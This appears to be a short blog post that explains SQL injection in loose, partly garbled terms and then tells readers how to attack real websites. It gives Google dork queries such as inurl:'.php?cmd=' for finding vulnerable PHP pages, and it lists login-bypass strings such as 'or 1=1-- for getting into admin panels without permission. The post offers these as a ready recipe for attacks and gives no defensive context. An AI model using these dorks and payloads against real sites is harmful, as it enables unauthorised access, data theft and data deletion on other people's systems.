What's a SQL injection?
Some SQL dorks and SQL strings...
- A Typical SQL injection attack is defined as an attacker could bypass the authentication, access or modify your data and also able to delete your data within a database without your permission.
- In some cases, SQL injection also can be used to execute commands over the operating system.
- Particularly SQL injection allows an attacker to more escalate to more damage attack inside a network/database.
Now we have to know what's Database and Database management system...
Database:
It's the systematic collection of data/database support storage manipulation of data. Where databases are more complex they are often developed using formal design and modeling techniques. The database makes data management easier.
Database management system :
It's a collection of programs which enable the user to access, modify and manipulate the data easily in a systematic way.
Now we have to know how to use them...
First of all, we have to find vulnerable websites using some SQL dorks which is given below...
1.inurl:".php?cmd="
2.inurl:".php?z="
3.inurl:".php?q="
4.inurl:".php?search="
5.inurl:".php?query="
6.inurl:".php?searchstring="
7.inurl:".php?keyword="
And also some SQL strings which is used to login on admin panel is given below...
'or 1=1--
"or 1=1--
Or 1=1--
'or'a'='a
"or"a"="a
'or''='
'=''or'
')or=('a'='a
You can check out this dorks and strings on this link Check out.
0 comments:
Post a Comment